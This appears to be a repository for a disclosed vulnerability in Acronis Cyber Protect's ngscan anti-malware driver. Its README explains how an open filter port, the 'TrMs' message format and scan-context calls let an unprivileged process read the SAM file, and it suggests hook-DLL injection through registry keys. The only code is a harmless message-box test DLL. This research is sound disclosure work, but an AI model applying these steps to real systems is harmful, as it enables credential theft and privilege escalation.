 90 |       <ConformanceMode>true</ConformanceMode>
 91 |       <PrecompiledHeader>Use</PrecompiledHeader>
 92 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
 93 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
 94 |     </ClCompile>
 95 |     <Link>
 96 |       <SubSystem>Windows</SubSystem>
 97 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 98 |       <EnableUAC>false</EnableUAC>
 99 |     </Link>
100 |   </ItemDefinitionGroup>
101 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
102 |     <ClCompile>
103 |       <WarningLevel>Level3</WarningLevel>
104 |       <FunctionLevelLinking>true</FunctionLevelLinking>
105 |       <IntrinsicFunctions>true</IntrinsicFunctions>
106 |       <SDLCheck>true</SDLCheck>
107 |       <PreprocessorDefinitions>WIN32;NDEBUG;DUMMYDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
108 |       <ConformanceMode>true</ConformanceMode>
109 |       <PrecompiledHeader>Use</PrecompiledHeader>
110 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
111 |     </ClCompile>
112 |     <Link>
113 |       <SubSystem>Windows</SubSystem>
114 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
115 |       <OptimizeReferences>true</OptimizeReferences>
116 |       <GenerateDebugInformation>true</GenerateDebugInformation>
117 |       <EnableUAC>false</EnableUAC>
118 |     </Link>
119 |   </ItemDefinitionGroup>
120 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
121 |     <ClCompile>
122 |       <WarningLevel>Level3</WarningLevel>
123 |       <SDLCheck>true</SDLCheck>
124 |       <PreprocessorDefinitions>_DEBUG;DUMMYDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
125 |       <ConformanceMode>true</ConformanceMode>
126 |       <PrecompiledHeader>Use</PrecompiledHeader>
127 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
128 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
129 |     </ClCompile>
130 |     <Link>
131 |       <SubSystem>Windows</SubSystem>
132 |       <GenerateDebugInformation>true</GenerateDebugInformation>
133 |       <EnableUAC>false</EnableUAC>
134 |     </Link>
135 |   </ItemDefinitionGroup>
136 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
137 |     <ClCompile>
138 |       <WarningLevel>Level3</WarningLevel>
139 |       <FunctionLevelLinking>true</FunctionLevelLinking>
140 |       <IntrinsicFunctions>true</IntrinsicFunctions>
141 |       <SDLCheck>true</SDLCheck>
142 |       <PreprocessorDefinitions>NDEBUG;DUMMYDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
143 |       <ConformanceMode>true</ConformanceMode>
144 |       <PrecompiledHeader>Use</PrecompiledHeader>
145 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
146 |     </ClCompile>
147 |     <Link>
148 |       <SubSystem>Windows</SubSystem>
149 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
150 |       <OptimizeReferences>true</OptimizeReferences>
151 |       <GenerateDebugInformation>true</GenerateDebugInformation>
152 |       <EnableUAC>false</EnableUAC>
153 |     </Link>
154 |   </ItemDefinitionGroup>
155 |   <ItemGroup>
156 |     <ClInclude Include="framework.h" />
157 |     <ClInclude Include="pch.h" />
158 |   </ItemGroup>
159 |   <ItemGroup>
160 |     <ClCompile Include="dllmain.cpp" />
161 |     <ClCompile Include="pch.cpp">
162 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
163 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
164 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
165 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
166 |     </ClCompile>
167 |   </ItemGroup>
168 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
169 |   <ImportGroup Label="ExtensionTargets">
170 |   </ImportGroup>
171 | </Project>


--------------------------------------------------------------------------------
/DummyDll/DummyDll.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClInclude Include="framework.h">
19 |       <Filter>Header Files</Filter>
20 |     </ClInclude>
21 |     <ClInclude Include="pch.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |   </ItemGroup>
25 |   <ItemGroup>
26 |     <ClCompile Include="dllmain.cpp">
27 |       <Filter>Source Files</Filter>
28 |     </ClCompile>
29 |     <ClCompile Include="pch.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |   </ItemGroup>
33 | </Project>


--------------------------------------------------------------------------------
/DummyDll/dllmain.cpp:
--------------------------------------------------------------------------------
 1 | // dllmain.cpp : Defines the entry point for the DLL application.
 2 | #include "pch.h"
 3 | #include <string>
 4 | 
 5 | BOOL APIENTRY DllMain(HMODULE hModule,
 6 |     DWORD  ul_reason_for_call,
 7 |     LPVOID lpReserved
 8 | )
 9 | {
10 |     DWORD dwCurrentPid = GetCurrentProcessId();
11 | 
12 |     std::string hello = "Hello from dllmain from PID " + std::to_string(dwCurrentPid);
13 | 
14 |     switch (ul_reason_for_call)
15 |     {
16 |     case DLL_PROCESS_ATTACH:
17 |         MessageBoxA(NULL, hello.c_str(), "d00t", MB_OK);
18 |         break;
19 |     case DLL_THREAD_ATTACH:
20 |     case DLL_THREAD_DETACH:
21 |     case DLL_PROCESS_DETACH:
22 |         break;
23 |     }
24 |     return TRUE;
25 | }


--------------------------------------------------------------------------------
/DummyDll/framework.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | #define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers
4 | // Windows Header Files
5 | #include <windows.h>
6 | 


--------------------------------------------------------------------------------
/DummyDll/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp: source file corresponding to the pre-compiled header
2 | 
3 | #include "pch.h"
4 | 
5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
6 | 


--------------------------------------------------------------------------------
/DummyDll/pch.h:
--------------------------------------------------------------------------------
 1 | // pch.h: This is a precompiled header file.
 2 | // Files listed below are compiled only once, improving build performance for future builds.
 3 | // This also affects IntelliSense performance, including code completion and many code browsing features.
 4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds.
 5 | // Do not add files here that you will be updating frequently as this negates the performance advantage.
 6 | 
 7 | #ifndef PCH_H
 8 | #define PCH_H
 9 | 
10 | // add headers that you want to pre-compile here
11 | #include "framework.h"
12 | 
13 | #endif //PCH_H
14 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | This is free and unencumbered software released into the public domain.
 2 | 
 3 | Anyone is free to copy, modify, publish, use, compile, sell, or
 4 | distribute this software, either in source code form or as a compiled
 5 | binary, for any purpose, commercial or non-commercial, and by any
 6 | means.
 7 | 
 8 | In jurisdictions that recognize copyright laws, the author or authors
 9 | of this software dedicate any and all copyright interest in the
10 | software to the public domain. We make this dedication for the benefit
11 | of the public at large and to the detriment of our heirs and
12 | successors. We intend this dedication to be an overt act of
13 | relinquishment in perpetuity of all present and future rights to this
14 | software under copyright law.
15 | 
16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
17 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
18 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
19 | IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
20 | OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
21 | ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
22 | OTHER DEALINGS IN THE SOFTWARE.
23 | 
24 | For more information, please refer to <https://unlicense.org>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | ## Introduction
  2 | 
  3 | ##### System Specs:
  4 | * Windows 10 1809 x64 EN
  5 | 
  6 | ##### Target:
  7 | * Acronis Home Cyber Protect
  8 | * Acronis Cyber Protect
  9 | 
 10 | ### Vulnerability Description
 11 | The Acronis "ngscan" anti-malware scan driver suffers from incorrect / improper access control placed on the filter communication port. 
 12 | The minifilter driver supports the following features that may be exploited:
 13 | * Arbitrary file read
 14 | * Sensitive Registry Key Modification (not exploited, trigger conditions unknown) which may lead to local code execution
 15 | 
 16 | 
 17 | ### Arbitrary File Read
 18 | Analysis of the ngscan.sys driver began by decompiling the driver with Ida Pro. The researched noted that while a device object was created, no symlinks were created to interact with the driver using `DeviceIoControl`.
 19 | As such, analysis continued by observing the Filter Communication Port capabilities.
 20 | During initialization, the driver creates five (5) communication ports to support interaction from other processes.
 21 | 
 22 | ![](Screenshots/Pasted%20image%2020220714164619.png)
 23 | 
 24 | Fig. 1: Routine supporting creation of up to five (5) filter communication ports (FCP)
 25 | 
 26 | This function was observed being called, initializing each of the 5 FCPs with a default dacl, with the last FCP being created with a NULL dacl.
 27 | ![](Screenshots/Pasted%20image%2020220714164824.png)
 28 | 
 29 | Fig. 2: FCP Creation with Default/NULL DACL
 30 | 
 31 | Analysis continued by observing the CreateNotifyCallback and MessageNotifyCallback functions specified by the filter driver. 
 32 | These callback functions are invoked whenever a process opens a connection, and sends a message to the communication port.
 33 | 
 34 | ![](Screenshots/Pasted%20image%2020220714165031.png)
 35 | 
 36 | Initial inspection of the MessageNotifyCallback showed that the buffer of the incoming message must meet the following requirements:
 37 | * the first DWORD must match an expected header value "TrMs" (Line 37)
 38 | * the second DWORD must contain the length of the *message contents* (note: this is different and distinct from the InputBufferLength)
 39 | * the message content length must be less than or equal to the full input buffer size minus the size of the message header 
 40 | 	* The message header is composed of the header and size, and another unknown value totalling 0xC (12) bytes
 41 | 
 42 | Once the checks have passed, a function number is parsed from the InputBuffer and is used in the following `switch` cases to select which function to execute with the provided input.
 43 | 
 44 | ![](Screenshots/Pasted%20image%2020220714165436.png)
 45 | 
 46 | Fig. 3: Subset of functions supported by the MessageNotifyCallback
 47 | 
 48 | Inspecting each of the supported functions showed two functions of interest for potential abuse leading to arbitrary file read.
 49 | 
 50 | ![](Screenshots/Pasted%20image%2020220714165557.png)
 51 | 
 52 | Fig. 4: Functions supporting creating a scan context and returning the scan context's file handle (Lines 206, 233)
 53 | 
 54 | While the exact functionality of a "scan context" is not fully known, analysis showed that a file scan context may be created for any given file specified in the user InputBuffer.
 55 | Once a scan context is created, the scan context ID is returned back to the user in the output buffer.
 56 | 
 57 | ![](Screenshots/Pasted%20image%2020220714165905.png)
 58 | 
 59 | Fig. 5: Create Scan Context routine returning scan context data back to the user
 60 | 
 61 | ![](Screenshots/Pasted%20image%2020220714165942.png)
 62 | 
 63 | Fig. 6: Data sent to minifilter driver requesting access to the protected SAM registry file (`\??\C:\Windows\System32\config\SAM`)
 64 | 
 65 | ![](Screenshots/Pasted%20image%2020220714170044.png)
 66 | 
 67 | Fig. 7: Response from minifilter driver including scan context ID (`0x3aaf`)
 68 | 
 69 | Once a scan context was created, and the ID retrieved, a handle to the file for which the scan context was created may be opened in the requesting application by again sending a message to the communication port.
 70 | 
 71 | ![](Screenshots/Pasted%20image%2020220714170246.png)
 72 | 
 73 | Fig. 8: Created Scan Context file handle retrieval
 74 | 
 75 | The function designated as `CreateFileReturnHandle0` was only called if the previous function `SearchScanContextsByID` returned a valid scan context.
 76 | E.g. only if the requesting process provided a valid context ID which was previously created by calling the aforementioned scan creation function.
 77 | The requesting program successfully opened a handle to the privileged file by providing the scan context ID to the function specified in Figure 8 (Figure 4, Line 233).
 78 | 
 79 | ![](Screenshots/Pasted%20image%2020220714170704.png)
 80 | 
 81 | Fig. 9: Successful retrieval of file handle for the SAM file
 82 | 
 83 | Using processhacker, access to the file handle was confirmed by viewing the requesting process' handles:
 84 | ![](Screenshots/Pasted%20image%2020220714170759.png)
 85 | 
 86 | Fig. 10: Process containing handle to SAM file
 87 | 
 88 | ![](Screenshots/Pasted%20image%2020220714170828.png)
 89 | 
 90 | Fig. 11: Read access granted to the obtained handle
 91 | 
 92 | ### Potential Code Injection
 93 | Further exploration of the supported functions showed the control of three registry keys which may be leveraged to gain code execution.
 94 | 
 95 | ![](Screenshots/Pasted%20image%2020220714171155.png)
 96 | 
 97 | Fig. 12: Functions supporting opening handles to registry keys
 98 | 
 99 | ![](Screenshots/Pasted%20image%2020220714171229.png)
100 | 
101 | Fig. 13: Opening the registry keys specifying the hook monitor dll to inject into a process
102 | 
103 | ![](Screenshots/Pasted%20image%2020220714171305.png)
104 | 
105 | Fig. 14: `OpenKey` function demonstrating the ability to modify a registry key with user-controlled data
106 | 
107 | The circumstances for dll injection for hooking by the Acronis suite were not determined, though if hook monitoring is enabled it is believed that the dll specified by the `x64HookLib` and `x86HookLib` registry keys would be injected into a designated process.
108 | ![](Screenshots/Pasted%20image%2020220714171908.png)
109 | 
110 | Fig. 15: x64HookLibKey specifying the hooking dll `C:\ProgramData\Acronis\NGMP\shared\acr_protect.x64.dll`
111 | 
112 | 
113 | ### Race Condition Allowing Limited Arbitrary File Read
114 | The process of opening a scan context has been pretermitted in the analysis for the Arbitrary File Read.
115 | A process may, instead of creating a scan context, brute-force scan context IDs by repeatedly issuing requests to the `GetScanContextByID` function, looping over ContextID values until one or more valid scan contexts is found.
116 | 


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220711185141.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220711185141.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714164619.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714164619.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714164824.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714164824.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714165031.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714165031.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714165436.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714165436.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714165557.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714165557.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714165813.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714165813.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714165905.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714165905.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714165942.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714165942.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714170044.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714170044.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714170246.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714170246.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714170704.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714170704.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714170759.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714170759.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714170828.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714170828.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714171155.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714171155.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714171229.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714171229.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714171305.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714171305.png


--------------------------------------------------------------------------------
/Screenshots/Pasted image 20220714171908.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alfarom256/CVE-2022-45451/9d4cd727bb781655f939abfb43f454b78b260333/Screenshots/Pasted image 20220714171908.png


--------------------------------------------------------------------------------